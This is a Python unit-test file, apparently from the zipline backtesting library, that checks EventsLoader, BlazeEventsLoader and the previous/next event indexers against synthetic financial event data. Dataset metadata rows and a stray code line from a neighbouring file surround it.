return self.images[self._image_addresses[idx - 1]]
| bsd-3-clause | -2,597,764,121,753,902,000 | 34.113043 | 75 | 0.552006 | false |
quantopian/zipline | tests/pipeline/test_events.py | 1 | 22248 | """
Tests for setting up an EventsLoader and a BlazeEventsLoader.
"""
from datetime import time
from itertools import product
from unittest import skipIf
import blaze as bz
import numpy as np
import pandas as pd
import pytz
from zipline.pipeline import Pipeline, SimplePipelineEngine
from zipline.pipeline.common import (
EVENT_DATE_FIELD_NAME,
TS_FIELD_NAME,
SID_FIELD_NAME,
)
from zipline.pipeline.data import DataSet, Column
from zipline.pipeline.domain import US_EQUITIES, EquitySessionDomain
from zipline.pipeline.loaders.events import EventsLoader
from zipline.pipeline.loaders.blaze.events import BlazeEventsLoader
from zipline.pipeline.loaders.utils import (
next_event_indexer,
previous_event_indexer,
)
from zipline.testing import ZiplineTestCase
from zipline.testing.fixtures import (
WithAssetFinder,
WithTradingSessions,
)
from zipline.testing.predicates import assert_equal
from zipline.utils.numpy_utils import (
categorical_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.pandas_utils import new_pandas, skip_pipeline_new_pandas
class EventDataSet(DataSet):
previous_event_date = Column(dtype=datetime64ns_dtype)
next_event_date = Column(dtype=datetime64ns_dtype)
previous_float = Column(dtype=float64_dtype)
next_float = Column(dtype=float64_dtype)
previous_datetime = Column(dtype=datetime64ns_dtype)
next_datetime = Column(dtype=datetime64ns_dtype)
previous_int = Column(dtype=int64_dtype, missing_value=-1)
next_int = Column(dtype=int64_dtype, missing_value=-1)
previous_string = Column(dtype=categorical_dtype, missing_value=None)
next_string = Column(dtype=categorical_dtype, missing_value=None)
previous_string_custom_missing = Column(
dtype=categorical_dtype,
missing_value=u"<<NULL>>",
)
next_string_custom_missing = Column(
dtype=categorical_dtype,
missing_value=u"<<NULL>>",
)
EventDataSet_US = EventDataSet.specialize(US_EQUITIES)
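# Reference dates used to enumerate the possible interleavings of event_date
# and timestamp for the synthetic events generated below.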
critical_dates = pd.to_datetime([
'2014-01-05',
'2014-01-10',
'2014-01-15',
'2014-01-20',
])
def make_events_for_sid(sid, event_dates, event_timestamps):
num_events = len(event_dates)
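    # Encode the sid and the event index into each value column so the tests
    # can tell exactly which event a looked-up value came from.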
return pd.DataFrame({
'sid': np.full(num_events, sid, dtype=np.int64),
'timestamp': event_timestamps,
'event_date': event_dates,
'float': np.arange(num_events, dtype=np.float64) + sid,
'int': np.arange(num_events) + sid,
'datetime': pd.date_range('1990-01-01', periods=num_events).shift(sid),
'string': ['-'.join([str(sid), str(i)]) for i in range(num_events)],
})
def make_null_event_date_events(all_sids, timestamp):
"""
Make an event with a null event_date for all sids.
Used to test that EventsLoaders filter out null events.
"""
return pd.DataFrame({
'sid': all_sids,
'timestamp': timestamp,
'event_date': pd.Timestamp('NaT'),
'float': -9999.0,
'int': -9999,
'datetime': pd.Timestamp('1980'),
'string': 'should be ignored',
})
def make_events(add_nulls):
"""
Every event has at least three pieces of data associated with it:
1. sid : The ID of the asset associated with the event.
2. event_date : The date on which an event occurred.
3. timestamp : The date on which we learned about the event.
       This can be before the event_date in the case of an
announcement about an upcoming event.
Events for two different sids shouldn't interact in any way, so the
interesting cases are determined by the possible interleavings of
event_date and timestamp for a single sid.
Fix two events with dates e1, e2 and timestamps t1 and t2.
Without loss of generality, assume that e1 < e2. (If two events have the
same occurrence date, the behavior of next/previous event is undefined).
    The remaining possible sequences of events are given by taking all
    possible 4-tuples of values drawn from `critical_dates`. For each
    possible interleaving, we generate a set of fake events with those dates
    and assign them to a new sid.
"""
def gen_date_interleavings():
for e1, e2, t1, t2 in product(*[critical_dates] * 4):
if e1 < e2:
yield (e1, e2, t1, t2)
event_frames = []
for sid, (e1, e2, t1, t2) in enumerate(gen_date_interleavings()):
event_frames.append(make_events_for_sid(sid, [e1, e2], [t1, t2]))
if add_nulls:
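        # Also emit one NaT-event_date row per sid for every critical date;
        # EventsLoader is expected to filter these out entirely.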
for date in critical_dates:
event_frames.append(
make_null_event_date_events(
np.arange(sid + 1),
timestamp=date,
)
)
return pd.concat(event_frames, ignore_index=True)
class EventIndexerTestCase(ZiplineTestCase):
@classmethod
def init_class_fixtures(cls):
super(EventIndexerTestCase, cls).init_class_fixtures()
cls.events = make_events(add_nulls=False).sort_values('event_date')
cls.events.reset_index(inplace=True)
def test_previous_event_indexer(self):
events = self.events
event_sids = events['sid'].values
event_dates = events['event_date'].values
event_timestamps = events['timestamp'].values
all_dates = pd.date_range('2014', '2014-01-31')
all_sids = np.unique(event_sids)
domain = EquitySessionDomain(
all_dates,
'US',
time(8, 45, tzinfo=pytz.timezone('US/Eastern')),
)
indexer = previous_event_indexer(
domain.data_query_cutoff_for_sessions(all_dates),
all_sids,
event_dates,
event_timestamps,
event_sids,
)
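        # indexer[i, j] is the row in `events` of the most recent event for
        # all_sids[j] that is visible (event_date and timestamp both passed)
        # on all_dates[i], or -1 if no event is visible yet.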
# Compute expected results without knowledge of null events.
for i, sid in enumerate(all_sids):
self.check_previous_event_indexer(
events,
all_dates,
sid,
indexer[:, i],
)
def check_previous_event_indexer(self,
events,
all_dates,
sid,
indexer):
relevant_events = events[events.sid == sid]
self.assertEqual(len(relevant_events), 2)
ix1, ix2 = relevant_events.index
# An event becomes a possible value once we're past both its event_date
# and its timestamp.
event1_first_eligible = max(
relevant_events.loc[ix1, ['event_date', 'timestamp']],
)
event2_first_eligible = max(
relevant_events.loc[ix2, ['event_date', 'timestamp']],
)
for date, computed_index in zip(all_dates, indexer):
if date >= event2_first_eligible:
# If we've seen event 2, it should win even if we've seen event
# 1, because events are sorted by event_date.
self.assertEqual(computed_index, ix2)
elif date >= event1_first_eligible:
# If we've seen event 1 but not event 2, event 1 should win.
self.assertEqual(computed_index, ix1)
else:
# If we haven't seen either event, then we should have -1 as
# sentinel.
self.assertEqual(computed_index, -1)
def test_next_event_indexer(self):
events = self.events
event_sids = events['sid'].values
event_dates = events['event_date'].values
event_timestamps = events['timestamp'].values
all_dates = pd.date_range('2014', '2014-01-31', tz='UTC')
all_sids = np.unique(event_sids)
domain = EquitySessionDomain(
all_dates,
'US',
time(8, 45, tzinfo=pytz.timezone('US/Eastern')),
)
indexer = next_event_indexer(
all_dates,
domain.data_query_cutoff_for_sessions(all_dates),
all_sids,
event_dates,
event_timestamps,
event_sids,
)
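        # indexer[i, j] is the row in `events` of the next upcoming event for
        # all_sids[j] on all_dates[i] (an event is eligible between its
        # timestamp and its event_date; the earlier event_date wins), or -1
        # if no event is eligible.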
# Compute expected results without knowledge of null events.
for i, sid in enumerate(all_sids):
self.check_next_event_indexer(
events,
all_dates,
sid,
indexer[:, i],
)
def check_next_event_indexer(self,
events,
all_dates,
sid,
indexer):
relevant_events = events[events.sid == sid]
self.assertEqual(len(relevant_events), 2)
ix1, ix2 = relevant_events.index
e1, e2 = relevant_events['event_date'].dt.tz_localize('UTC')
t1, t2 = relevant_events['timestamp'].dt.tz_localize('UTC')
for date, computed_index in zip(all_dates, indexer):
# An event is eligible to be the next event if it's between the
# timestamp and the event_date, inclusive.
if t1 <= date <= e1:
# If e1 is eligible, it should be chosen even if e2 is
# eligible, since it's earlier.
self.assertEqual(computed_index, ix1)
elif t2 <= date <= e2:
# e2 is eligible and e1 is not, so e2 should be chosen.
self.assertEqual(computed_index, ix2)
else:
# Neither event is eligible. Return -1 as a sentinel.
self.assertEqual(computed_index, -1)
class EventsLoaderEmptyTestCase(WithAssetFinder,
WithTradingSessions,
ZiplineTestCase):
START_DATE = pd.Timestamp('2014-01-01')
END_DATE = pd.Timestamp('2014-01-30')
ASSET_FINDER_COUNTRY_CODE = 'US'
@classmethod
def init_class_fixtures(cls):
cls.ASSET_FINDER_EQUITY_SIDS = [0, 1]
cls.ASSET_FINDER_EQUITY_SYMBOLS = ['A', 'B']
super(EventsLoaderEmptyTestCase, cls).init_class_fixtures()
def frame_containing_all_missing_values(self, index, columns):
frame = pd.DataFrame(
index=index,
data={c.name: c.missing_value for c in EventDataSet.columns},
)
for c in columns:
# The construction above produces columns of dtype `object` when
# the missing value is string, but we expect categoricals in the
# final result.
if c.dtype == categorical_dtype:
frame[c.name] = frame[c.name].astype('category')
return frame
@skipIf(new_pandas, skip_pipeline_new_pandas)
def test_load_empty(self):
"""
For the case where raw data is empty, make sure we have a result for
all sids, that the dimensions are correct, and that we have the
correct missing value.
"""
raw_events = pd.DataFrame(
columns=["sid",
"timestamp",
"event_date",
"float",
"int",
"datetime",
"string"]
)
next_value_columns = {
EventDataSet_US.next_datetime: 'datetime',
EventDataSet_US.next_event_date: 'event_date',
EventDataSet_US.next_float: 'float',
EventDataSet_US.next_int: 'int',
EventDataSet_US.next_string: 'string',
EventDataSet_US.next_string_custom_missing: 'string'
}
previous_value_columns = {
EventDataSet_US.previous_datetime: 'datetime',
EventDataSet_US.previous_event_date: 'event_date',
EventDataSet_US.previous_float: 'float',
EventDataSet_US.previous_int: 'int',
EventDataSet_US.previous_string: 'string',
EventDataSet_US.previous_string_custom_missing: 'string'
}
loader = EventsLoader(
raw_events, next_value_columns, previous_value_columns
)
engine = SimplePipelineEngine(
lambda x: loader,
self.asset_finder,
)
results = engine.run_pipeline(
Pipeline({
c.name: c.latest for c in EventDataSet_US.columns
}, domain=US_EQUITIES),
start_date=self.trading_days[0],
end_date=self.trading_days[-1],
)
assets = self.asset_finder.retrieve_all(self.ASSET_FINDER_EQUITY_SIDS)
dates = self.trading_days
expected = self.frame_containing_all_missing_values(
index=pd.MultiIndex.from_product([dates, assets]),
columns=EventDataSet_US.columns,
)
assert_equal(results, expected)
class EventsLoaderTestCase(WithAssetFinder,
WithTradingSessions,
ZiplineTestCase):
START_DATE = pd.Timestamp('2014-01-01')
END_DATE = pd.Timestamp('2014-01-30')
ASSET_FINDER_COUNTRY_CODE = 'US'
@classmethod
def init_class_fixtures(cls):
# This is a rare case where we actually want to do work **before** we
# call init_class_fixtures. We choose our sids for WithAssetFinder
# based on the events generated by make_event_data.
cls.raw_events = make_events(add_nulls=True)
cls.raw_events_no_nulls = cls.raw_events[
cls.raw_events['event_date'].notnull()
]
cls.next_value_columns = {
EventDataSet_US.next_datetime: 'datetime',
EventDataSet_US.next_event_date: 'event_date',
EventDataSet_US.next_float: 'float',
EventDataSet_US.next_int: 'int',
EventDataSet_US.next_string: 'string',
EventDataSet_US.next_string_custom_missing: 'string'
}
cls.previous_value_columns = {
EventDataSet_US.previous_datetime: 'datetime',
EventDataSet_US.previous_event_date: 'event_date',
EventDataSet_US.previous_float: 'float',
EventDataSet_US.previous_int: 'int',
EventDataSet_US.previous_string: 'string',
EventDataSet_US.previous_string_custom_missing: 'string'
}
cls.loader = cls.make_loader(
events=cls.raw_events,
next_value_columns=cls.next_value_columns,
previous_value_columns=cls.previous_value_columns,
)
cls.ASSET_FINDER_EQUITY_SIDS = list(cls.raw_events['sid'].unique())
cls.ASSET_FINDER_EQUITY_SYMBOLS = [
's' + str(n) for n in cls.ASSET_FINDER_EQUITY_SIDS
]
super(EventsLoaderTestCase, cls).init_class_fixtures()
cls.engine = SimplePipelineEngine(
lambda c: cls.loader,
asset_finder=cls.asset_finder,
default_domain=US_EQUITIES,
)
@classmethod
def make_loader(cls, events, next_value_columns, previous_value_columns):
# This method exists to be overridden by BlazeEventsLoaderTestCase
return EventsLoader(events, next_value_columns, previous_value_columns)
@skipIf(new_pandas, skip_pipeline_new_pandas)
def test_load_with_trading_calendar(self):
results = self.engine.run_pipeline(
Pipeline({c.name: c.latest for c in EventDataSet_US.columns}),
start_date=self.trading_days[0],
end_date=self.trading_days[-1],
)
for c in EventDataSet_US.columns:
if c in self.next_value_columns:
self.check_next_value_results(
c,
results[c.name].unstack(),
self.trading_days,
)
elif c in self.previous_value_columns:
self.check_previous_value_results(
c,
results[c.name].unstack(),
self.trading_days,
)
else:
raise AssertionError("Unexpected column %s." % c)
@skipIf(new_pandas, skip_pipeline_new_pandas)
def test_load_properly_forward_fills(self):
# Cut the dates in half so we need to forward fill some data which
# is not in our window. The results should be computed the same as if
# we had computed across the entire window and then sliced after the
# computation.
dates = self.trading_days[len(self.trading_days) // 2:]
results = self.engine.run_pipeline(
Pipeline({c.name: c.latest for c in EventDataSet_US.columns}),
start_date=dates[0],
end_date=dates[-1],
)
for c in EventDataSet_US.columns:
if c in self.next_value_columns:
self.check_next_value_results(
c,
results[c.name].unstack(),
dates,
)
elif c in self.previous_value_columns:
self.check_previous_value_results(
c,
results[c.name].unstack(),
dates,
)
else:
raise AssertionError("Unexpected column %s." % c)
def assert_result_contains_all_sids(self, results):
assert_equal(
list(map(int, results.columns)),
self.ASSET_FINDER_EQUITY_SIDS,
)
def check_previous_value_results(self, column, results, dates):
"""
Check previous value results for a single column.
"""
# Verify that we got a result for every sid.
self.assert_result_contains_all_sids(results)
events = self.raw_events_no_nulls
# Remove timezone info from trading days, since the outputs
# from pandas won't be tz_localized.
dates = dates.tz_localize(None)
for asset, asset_result in results.iteritems():
relevant_events = events[events.sid == asset.sid]
self.assertEqual(len(relevant_events), 2)
v1, v2 = relevant_events[self.previous_value_columns[column]]
event1_first_eligible = max(
# .ix doesn't work here because the frame index contains
# integers, so 0 is still interpreted as a key.
relevant_events.iloc[0].loc[['event_date', 'timestamp']],
)
event2_first_eligible = max(
relevant_events.iloc[1].loc[['event_date', 'timestamp']]
)
for date, computed_value in zip(dates, asset_result):
if date >= event2_first_eligible:
# If we've seen event 2, it should win even if we've seen
# event 1, because events are sorted by event_date.
self.assertEqual(computed_value, v2)
elif date >= event1_first_eligible:
# If we've seen event 1 but not event 2, event 1 should
# win.
self.assertEqual(computed_value, v1)
else:
# If we haven't seen either event, then we should have
# column.missing_value.
assert_equal(
computed_value,
column.missing_value,
# Coerce from Timestamp to datetime64.
allow_datetime_coercions=True,
)
def check_next_value_results(self, column, results, dates):
"""
        Check next value results for a single column.
"""
self.assert_result_contains_all_sids(results)
events = self.raw_events_no_nulls
# Remove timezone info from trading days, since the outputs
# from pandas won't be tz_localized.
dates = dates.tz_localize(None)
for asset, asset_result in results.iteritems():
relevant_events = events[events.sid == asset.sid]
self.assertEqual(len(relevant_events), 2)
v1, v2 = relevant_events[self.next_value_columns[column]]
e1, e2 = relevant_events['event_date']
t1, t2 = relevant_events['timestamp']
for date, computed_value in zip(dates, asset_result):
                if t1 <= date <= e1:
                    # Event 1 is eligible (we are between its timestamp and
                    # its event_date), so it should be chosen even if event 2
                    # is also eligible, since it occurs earlier.
                    self.assertEqual(computed_value, v1)
                elif t2 <= date <= e2:
                    # Event 2 is eligible and event 1 is not, so event 2's
                    # value should be chosen.
                    self.assertEqual(computed_value, v2)
                else:
                    # Neither event is currently eligible, so we should have
                    # column.missing_value.
assert_equal(
computed_value,
column.missing_value,
# Coerce from Timestamp to datetime64.
allow_datetime_coercions=True,
)
def test_wrong_cols(self):
# Test wrong cols (cols != expected)
events = pd.DataFrame({
'c': [5],
SID_FIELD_NAME: [1],
TS_FIELD_NAME: [pd.Timestamp('2014')],
EVENT_DATE_FIELD_NAME: [pd.Timestamp('2014')],
})
EventsLoader(events, {EventDataSet_US.next_float: 'c'}, {})
EventsLoader(events, {}, {EventDataSet_US.previous_float: 'c'})
with self.assertRaises(ValueError) as e:
EventsLoader(events, {EventDataSet_US.next_float: 'd'}, {})
msg = str(e.exception)
expected = (
"EventsLoader missing required columns ['d'].\n"
"Got Columns: ['c', 'event_date', 'sid', 'timestamp']\n"
"Expected Columns: ['d', 'event_date', 'sid', 'timestamp']"
)
self.assertEqual(msg, expected)
class BlazeEventsLoaderTestCase(EventsLoaderTestCase):
"""
Run the same tests as EventsLoaderTestCase, but using a BlazeEventsLoader.
"""
@classmethod
def make_loader(cls, events, next_value_columns, previous_value_columns):
return BlazeEventsLoader(
bz.data(events),
next_value_columns,
previous_value_columns,
)
| apache-2.0 | 8,105,170,151,466,807,000 | 35.834437 | 79 | 0.572726 | false |